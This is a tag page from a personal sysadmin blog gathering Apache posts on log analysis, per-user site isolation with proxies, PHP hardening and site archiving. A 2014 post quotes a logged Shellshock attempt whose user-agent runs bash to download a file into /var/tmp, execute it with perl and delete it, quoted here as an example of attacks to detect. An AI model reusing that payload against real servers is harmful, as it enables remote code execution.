About Archive Tags RSS Feed


Entries tagged apache

You're making me live

26 November 2007 21:50

Is there an existing system which will allow me to query Apache logfiles via an SQL string? (Without importing into a database first).

I've found the perl library SQL::YASL - but that has a couple of omissions which mean it isn't ideal for my task:

  • It doesn't understand DISTINCT
  • It doesn't understand COUNT
  • It doesn't understand SUM

Still it did allow me to write a simple shell which works nicely for simple cases:

SQL>LOAD /home/skx/hg/engaging/logs/access.log;
SQL>select path,size from requests where size > 10000;
path size 
/css/default.css 13813 
/js/prototype.js 71261 
/js/effects.js 37872 
/js/dragdrop.js 30645 
/js/controls.js 28980 
/js/slider.js 10403 
/view/messages 15447 
/view/messages 15447 
/recent/messages 25378 

It does mandate the use of a "WHERE" clause, but that was easily fixed with "WHERE 1=1". If I could just have support for count I could do near realtime interesting things...

Then again maybe I should just log directly and not worry about it. I certainly don't want to create my own SQL engine .. it just seems that Perl doesn't have a suitable library already made which is a bit of a shocker!

| No comments


This is the part where you tell me what matters is on the inside

24 November 2009 21:50

Some technology evolves very quickly, for example the following things are used by probably 80% of readers of this page:

  • A web browser.
  • A mail client.
  • A webserver.

But other technology is stuck in the past and only sees laclustre updates and innovations (not that inovation is mandatory or automatically a good thing)

Right now I'm looking at my webserver logs, trying to see who is viewing my sites, where they came from, and what their favourite pie is.

In the free world we have the choice of awstats, webalizer, and visitors (possibly more that I'm unaware of). In the commercial world everybody and their dog uses Google's analytics.

On the face of it a web analysis package is trivial:

  • Read in some access.log files.
  • Process to some internal database representaqtion.
  • Generate static/dynamic HTML output from your intermediate form, optionally including graphs, images, and pie-charts.

If you add javascript-fu to each of your pages you can track page titles, exit links, screen resolutions, and other data to record too. (Though I guess thats a seperate problem; trying to merge that data in with the data you have in your access log without making nasty links like "GET /trackin.gif?x_res=800;y_res=600". Anyway I guess with cookies you could correlate reasonably carefully.)

In conclusion why are my web statistics so dull, boring, and less educational than I desire?

I'd be tempted to experiment, but I suspect this is a problem which has subtle issues I'm overlooking and requires an artistic slant to make pretty.

(ObLink: asql is my semi-solution to logfile analysis.)

ObFilm: Bound



I am lightened, can we drop this?

16 February 2010 21:50

As part of some house-keeping I've been checking over my systems and ensuring they're all tickity-boo for the past couple of days.

One thing that I'm getting increasingly tempted by is converting my kvm guest to a 64-bit system.

I've not quite sold myself on the prospect of what will be a fair amount of downtime, but I'm 90% there.

I do think that a lot of my setup needs an overhaul, for example:

  • Running all my websites under www-data is beginning to worry me.
  • Running services as root is beginning to make me more and more paranoid.

One possible plan is to wipe my system, and then restore data from backups. A perhaps saner approach is divide my guest into two smaller ones, and migrate services over one by one (e.g. website1, website2, .. websiteN, email, etc).

For the moment I've taken a complete dump of my existing guest, and I'm running it with an IP in the range on my desktop. That's at least given me a clear idea of the amount of work involved.

I'm still a little unclear on how best to manage running N websites with the intention they'll each run under their own UID. I guess it comes down to having a few instances of nginx/lighttpd/apache and then proxy from *:80 to the actual back-end. Precisely which mixture of services to use is a little overwhelming. Though at some point soon I need to start enabling IPv6 support, and that changes things a little.

(Not least because nginx has no IPv6 support present in the Lenny release - I've got a backported package which I run on the Debian Administration website.)

It's possible I could hack mod_vhost_alias to redirect/proxy to a local port based upon the virtual hostname present in the request - that's pretty trivial and I've already done something similar for work purposes. Though something like that should presumably already exist? I would expect a map of some form:


That has to be about the minimum necessary information to make the decision; a pair of vhost name & local destination.

/me googles some..


OK quick update I've added local users for some of my sites, and now have them running under thttpd.

skx:/etc/thttpd# ls -ltr /home/www/ | tail -n 4
drwxr-sr-x  4 s-static   s-static   4096 Jan 15 01:41 static.steve.org.uk
drwxr-sr-x  5 s-openid   s-openid   4096 Feb 16 21:31 openid.steve.org.uk
drwxr-sr-x  6 s-images   s-images   4096 Feb 16 21:52 images.steve.org.uk
drwxr-sr-x  5 s-packages s-packages 4096 Feb 16 22:03 packages.steve.org.uk

That seems to work well, with a small wrapper script to start N instances of thttpd instead of a single one. Minor issues are that I'm using mod_proxy to forward requests to the thtpd instances running upon the loopback - and it was initially logging as the source IP. A quick patch later all is well.

I'll leave it running a couple of the simple sites for the next few days and see if it kills children. If it does I'll convert the rest.

Probably will aim to have nginx in front of thttpd, instead of Apache, but this way I don't have to worry about mod_rewrite rules just yet.

ObFilm: Cruel Intentions



If you were a comic book character, what character would you be?

19 February 2010 21:50

I've been overhauling the way that I am host a number of virtual websites upon my main box. Partly to increase security, and partly for a cleaner separation or roles, ownership, and control. (In general everything on my box is "mine", but some things are "ours"...)

After a fair amount of experimentation I decided that I wasn't willing or able to rewrite all my Apache mod_rewrite rules just yet. So my interim plan was to update each existing virtual host:

  • Add a dedicated user & group to run it under.
  • Launch it via a minimal server listening upon the loopback adapter.
  • Have Apache 2.x proxy through to it.
    • Expanding any mod_rewrite rules prior to the proxying.

To make it clear what the users were for I decided that every hosting-user would have an "s-" prefix. So the virtual host "static.steve.org.uk" was initially going to be served by the s-static user.

The thttpd configuration file would look like this, and would be located in /etc/thttpd/sites/static.steve.org.uk:


(I wrote a trivial script to stop/start all the sites en mass, and removed the default thttpd init script, logrotation job, and similar things.)

How did I decide which port to run this instance under? By taking the UID of the user:

steve@skx:~$ id s-static
uid=1008(s-static) gid=1009(s-static) groups=1009(s-static)

With this in place I could then update the Apache configuration file from serving the site directly to merely proxying to the back-end server:

<VirtualHost *>
    ServerName  static.steve.org.uk

    # Proxy ACL
    <Proxy *>
        Order allow,deny
        Allow from all

    # Proxy directives
    ProxyPass          /   http://localhost:1008/
    ProxyPassReverse   /   http://localhost:1008/
    ProxyPreserveHost on

So was that all there is to it? Sadly not. There were a couple of minor issues, some of which were:


I have various cron-jobs in my main steve account which previously updated blog indexes, etc. (I use namazu2 to make my blog searchable.)

I had to change the ownership of the existing indexes, the scripts themselves, and move the cronjob to the new s-blog user.

cross-user dependencies

I run a couple of sites which pull in content from other locations. For example a couple of list summaries, and archives. These are generally fed from a ~/.procmail snippet under my primary login.

Since my primary login no longer owns the web-tree it is no longer able to update things directly. Instead I had to duplicate a couple of subscriptions and move this work under the UID of the site-owner.

I'm no longer running apache

For a day or two I'd forgotten I was using the apache facility to include snippets in my site; such as links to my wishlist.

Since I'm not using Apache in the back-end server-parsed files no longer work. Happily I'm using a simple template-based setup for my main sites, so I updated the template-parser to understand "##include ./path/to/file". For example this source file produces my donation page.

The upshot is my "static" site is even more static, which is a good thing.

uploads are harder

Several of my domains host entirely static content which is generated on my main desktop machine, and then uploaded via rsync post-build.

I had to add some more accounts and configure SSH keys, then update the uploading routines/Makefiles appropriately. Not a major annoyance, but suddenly my sshd_config file has gone from "PermitUser steve,backup" to including many additional accounts.

The single biggest pain was handling my my mercurial repositories - overhauling that took a bit of creativity to ensure that nothing was broken for existing or new checkouts. I wish that a backport of mercurial-server was trivial because I'd love to be using that.

In general though watching the thttpd logs has been sufficient to spot problems. I had to tweak things a little to generate statistics properly, but otherwise all is good.

Why thttpd? Well small, lightweight, and the ability to run CGI scripts. Something missing from nginx for example.

I'm still aiming to remove apache2 from the front-end - it is mostly just a dumb proxy, but it does perform some ACL operations and expand mod_rewrite rules. I could port those to another engine .. but not today.

The most likely candidates are nginx, perlbal, or lighttpd - each of these should be capable of doing simple ACL checks, and performing mod_rewrite-like rules.

ObFilm: Mallrats



That friend promises his undying friendship if you would do him a small favour.

17 June 2010 21:50

Perl & Apache?

Once upon a time, within the past year, I saw mention of a simpler version of mod_perl - an apache module which let you write code to run within the context of a persistent perl process.

However my DuckDuckGofu is weak, and I'm struggling to find this project.

Did I dream it, or could somebody tell me where it lives?

Dynamic Picture Frames

So I've been taking pictures recently. Lots of pictures.

Many times many images have been printed and hung upon my walls, and the price of frames is starting to become onerous.

I'd love to see some kind of "dynamic" picture wall - but the two alternatives I considered fail:

Metal & Magnets

Place a huge sheet of metal upon your wall. Then put wee magnets inside your frames.


Imagine a full wall that was paneled with what is essentially a large notice-board..

Both of these would look ugly; the metal one perhaps less so.

But the idea of having a wall which could have pictures mounted upon it, without having big nail holes if you rearranged and which could cope with dynamic repositioning and sizes is nice ..

Invent it for me? I'll buy one. Probably even two...

ObFilm: The Godfather



Paying attention to webserver logs

2 December 2014 21:50

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt: blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget ; \
curl -O;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts: - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.




Best practice - Don't serve writeable PHP files

2 February 2016 21:50

I deal with compromises often enough of PHP-based websites that I wish to improve hardening.

One obvious way to improve things is to not serve PHP files which are writeable by the webserver-user. This would ensure that things like wp-content/uploads didn't get served as PHP if a compromise wrote valid PHP there.

In the past using php5-suhosin would have allowd this via the suhosin.executor.include.allow_writable_files flag.

Since suhosin is no longer supported under Debian Jessie I wonder if there is a simple way to achieve this?

I've written a toy-module which allows me to call stat on every request, and return a 403 on access to writeable files/directories. But it seems like I shouldn't need to write my own code for this functionality.

Any pointers welcome; happy to post my code if that is useful but suspect not - it just shouldn't exist.



Translating my website to Finnish

28 December 2017 21:50

I've now been living in Finland for two years, and I'm pondering a small project to translate my main website into Finnish.

Obviously if my content is solely Finnish it will become of little interest to the world - if my vanity lets me even pretend it is useful at the moment!

The traditional way to do this, with Apache, is to render pages in multiple languages and let the client(s) request their preferred version with Accept-Language:. Though it seems that many clients are terrible at this, and the whole approach is a mess. Pretending it works though we render pages such as:


Then "magic happens", such that the right content is served. I can then do extra-things, like add links to "English" or "Finnish" in the header/footers to let users choose.

Unfortunately I have an immediate problem! I host a bunch of websites on a single machine and I don't want to allow a single site compromise to affect other sites. To do that I run each website under its own Unix user. For example I have the website "steve.fi" running as the "s-fi" user, and my blog runs as "s-blog", or "s-blogfi":

root@www ~ # psx -ef | egrep '(s-blog|s-fi)'
s-blogfi /usr/sbin/lighttpd -f /srv/blog.steve.fi/lighttpd.conf -D
s-blog   /usr/sbin/lighttpd -f /srv/blog.steve.org.uk/lighttpd.conf -D
s-fi     /usr/sbin/lighttpd -f /srv/steve.fi/lighttpd.conf -D

There you can see the Unix user, and the per-user instance of lighttpd which hosts the website. Each instance binds to a high-port on localhost, and I have a reverse proxy listening on the public IP address to route incoming connections to the appropriate back-end instance.

I used to use thttpd but switched to lighttpd to allow CGI scripts to be used - some of my sites are slightly/mostly dynamic.

Unfortunately lighttpd doesn't support multiviews without some Lua hacks which will require rewriting - as the supplied example only handles Accept rather than the language-header I want.

It seems my simplest solution is to switch from having lighttpd on the back-end to running apache2 instead, but I've not yet decided which way to jump.

Food for thought, anyway.

hyvää joulua!



Archiving Debian-Administration.org, for real

1 November 2020 13:00

Back in 2017 I announced that the https://Debian-Administration.org website was being made read-only, and archived.

At the time I wrote a quick update to save each requested page as a flat-file, hashed beneath /tmp, with the expectation that after a few months I'd have a complete HTML-only archive of the site which I could serve as a static-website, instead of keeping the database and pile of CGI scripts running.

Unfortunately I never got round to archiving the pages in a git-repository, or some other store, and I usually only remembered this local tree of content was available a few minutes after I'd rebooted the server and lost the stuff - as the reboot would reap the contents of /tmp!

Thinking about it today I figured I probably didn't even need to do that, instead I just need to redirect to the wayback machine. Working on the assumption that the site has been around for "a while" it should have all the pages mirrored by now I've made a "final update" to Apache:

 RewriteEngine on
 RewriteRule   ^/(.*)  "http://web.archive.org/web/https://debian-administration.org/$1"  [R,L]

Assuming nobody reports a problem in the next month I'll retire the server and make a simple docker container to handle the appropriate TLS certificate renewal, and hardwire the redirection(s) for the sites involved.

| 1 comment